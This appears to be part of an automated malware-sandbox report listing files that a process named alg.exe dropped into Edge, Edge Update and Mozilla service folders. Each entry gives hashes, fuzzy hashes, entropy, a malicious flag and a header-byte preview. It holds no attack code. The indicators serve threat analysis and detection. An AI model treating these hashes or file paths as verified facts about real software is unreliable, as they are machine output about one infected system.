                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4B4BC627C94BFF7EF7E90EE4BD24444E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:84511EDCEFC8BBBD6C87ECF942A88B4067F25BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD7D6F95C725F88D7408526CF5A9789AC78E00E03C62035EBB1186D88E577306
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:30EA9AEC834F2C3FABEA2B7F6FC9E6935523886D017E33C06AC54BC6C751BF6F734C1FF4F0A35E1783F00DD65D5F44C0EF4077B05DD2E8E4304F5579C22E1339
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......D..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.950766441017687
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:QfD3zO9ZhBGloizM3HRNr00+Dmg27RnWGj:6DaalxzM00+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1CAC271B46A09230F3266F2A4042C606
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C387899136A6934ACE599E657A7B94C4BF166046
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:349C6CC628AB4BB5A5BC0B63A86F00762C873A61C5653252A3B17132855C9438
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:203E5383B27E51E7A2175D99A66C6D782ED5C9D7DB4E17BAEF2B4B4124722F435CF895B8B9D350949FD8EBF61993EA20C5457FD76AF8403CFD1BB3C93CCA52BB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......E,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.824623550603783
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:BTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhJDmg27RnN:wI72LvkrDpbxJRoIM2D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D9E67A3F61D7B44D951A6AF4B676CE1B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:60926D8721BD0D894F5A454617E2CA8D943D326D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D1951274878BE8D8BEE5C987AE341C1B9E534C48ABC04270DF1E1562035C9EF4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D99A258A8E1B18BDC990A97F2EA02F8FD403ADA23B68DC4100C979FEC1B043EF0A6E06C7B0F73CABD65AB5E02E6331D2A1EE09CF5D3A313D8B05F346BBD3E61D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....r.B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.097257851221503
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:3W9Jml9mmijviMnF+ZxmQWcbLw8VCsqjnhMgeiCl7G0nehbGZpbD:3Wnm5iOMkjmQWkVGDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:61B0B6491ABC2E065EF568F533882664
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC92B87834591262CCC178EF950217411A43DD64
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1BF7A1A1B54A1154D7658773F3788DDBE9AA5B02A96F60BCFC70AB61C38AB793
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E269F2CB0DCE6B823FD0E1CE28907CFD9D5B88831225264FBF5191921B88F2A959EF4657E5ABF04008461EA50ACD6CFA272D84034D65282EE2B25C73604EEECA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166379245320892
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:FwNPdQO7BJTfmErDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6661226F6C1540B67F9C02562D4B010D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5B4E3CE1020D5B7EB87EDDE8117EB8884CEF6D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9419F4F88E9BB455439836FEC5B573F0A6632A1DA146C14930459337F53125F4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7CD3FE4BDB8E2137F9E6F0AB07571744DB6ACD9E250989F3BC9FB2DCD8470D124B383580EF092B65F2E7FA19903DC28E86D14F30DFC53300F1CC73018122CA5B
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145507260950804
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:diD2VmA1YXwHwlklb8boUuWPg2ghsqjnhMgeiCl7G0nehbGZpbD:MD2VmAyiwIb8boQmDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F158F975C6B6A2CFC6300B1B94558A4A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CBF158FAC5603665398730D118EE29A6DB269649
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A234DD7831F4982DD9892F2F85D501DD2A5C85AC865B6B5341F0B63A60D358DB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1A06F60BFAFE285127A2B4A63639472D4463D2045D3DAC67E39A9984578F777294F3A8179E0698FAEA0F20E551132F1D8E3E15A9B563222F2B58206B61EAD9AB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p........... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166375953240216
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:VwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:VwNPdQO7BJTfmErDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:44B9907C4065C3A8352F4B9AA4F12EC5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:155ED14B52846F9C52D589316B605390AAC70962
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F4BF09AD6A5D3314D8DA185878A3643F5248BA488941884C0FC07AF9D382087D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:974B0DA9397C597A09C5085DC9CE0FA8C69637B99914396F84CAB55BADD024A26219219665B1152DA000BA9BABD63EB6D439C8FD5E0C8B00FCE69F31C891CF5D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@...................................._B.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141866175801265
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:a4lbht6BHrsqjnhMgeiCl7G0nehbGZpbD:blNtqHfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C26417EEAA731BE7184C1463B2BBC331
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:59D0FDD425E6EC153B52BCD6CA72D62241C8A700
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FC1B56F79814D9452BB82B784D6EB960577D3C21774BD5CCBC621F5F57E4F75A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:81E3A892604F4D21335BEF66D225B9BD82B368AFFED9B23E76AD5D39487EFABE682BE4812F4F93C7115187A69C398D37AA7CF9A897A9E67C116A0C7F3C549BE8
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.........................................................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.138880091832861
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:lIkOkTB+wXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:lIxkTBVXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A337146687D53D56DD7E79B17C2043EE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BE7A16C96966A315C47BFC24454A557BB9BAE971
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C91E2556154154AF540A67D566FF21263033FE0CCAF5A586AB308412EE2846B5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2D7E3C2E81FA2B552BAA839E9C6732E88AA78EF334233FAE82B85EB00AC8546F86CB45D9274B2420501BA16439CAAF73BF14E1F360C2C343A90D964B41042029
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................3.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.236809364185133
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:U4lssmroC0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:Ucssmr2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B203FBC5D5FAAA3A77D217315C07FF56
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8D21059DF3107DE7004CD52B75CC42A21434AD4C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:102026EB97A8607F2CF7C9021EB8E8C26954C86D8D2E5FF7DA276B67F00B2395
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8EA0025891ADD4337AEFDD2DFDA10D3B6698C1231E44CA6082FFB9CCA580AF31071D6CEA0FE2051EEE713E602D18F9AD4F9275DA6D59A0297160196DFA290BCE
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.33854760065137
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:T03cT++foSBWU2Yxhkg1sqjnhMgeiCl7G0nehbGZpbD:w3cK+foQWU2YnPpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:37B54C75628F6115F8FA636633B82277
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1A65040A0101A1C1AD89BD0301AF47D4A126C51E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:407D38ED5426B0C62C04A692E7C4DC3A08728FE691A8C4217B530EA415E1EFD3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4DD3DD9BD9A359AA90AA4BD9B7DEB937D6848E53C2F7D6D8E0BE9CB60877A6E6A8722516CE23899006AE29D04DBFC589C05E872FDA31E56DCC2DA740A77077AB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..................................x.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.138929466585361
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:MbrNRzB+NVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:MbBRzBgVsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68E8CEECCDB33A8162B6D05AFF3BBB9F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:27A6DA5FCDD674E36943E3123F19E88F824F4D3D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:210A530783D513865CD00E4DEB9C3AFA12E0BA544F91401627771566E817A9DB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:16B19AAF44FF1708EDB379DAAD3163671EEE075C83B2D49D79AC728EAE04F9C9DE61327C6B5D5D78C866BD2826807EC61DD7D5F742D1578BA27D06ADD0A5D474
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................W...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.940506578412294
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:Dy53w24gQu3TPZ2psFkiSqwozyDmg27RnWGj:DyFQgZqsFki+ozyD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0088540B2464CC17644FB847BCBF643D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:608493D426FD4CB9A1679FB23AB747D5B51DE536
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DC5CC59BB177248BEB547C36710FF973B2F474E6C9929E1341811E51687F7C00
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EC109A0E976884392938D6A927685A3ED35845BE10206A510E1002FCFC1DA182E358BF6FE0E1B141707CBA82CCE896AFA63EBB2596D6281BCA6AFBDF40EDC595
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.347835173495774
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:NQVTZu0JSsqjnhMgeiCl7G0nehbGZpbD:mVTZurDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C01ACF77F8AAC8307BDFD0F6209E9B38
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:28234CDDED16DA80A4B249E701FE5BAA78A80159
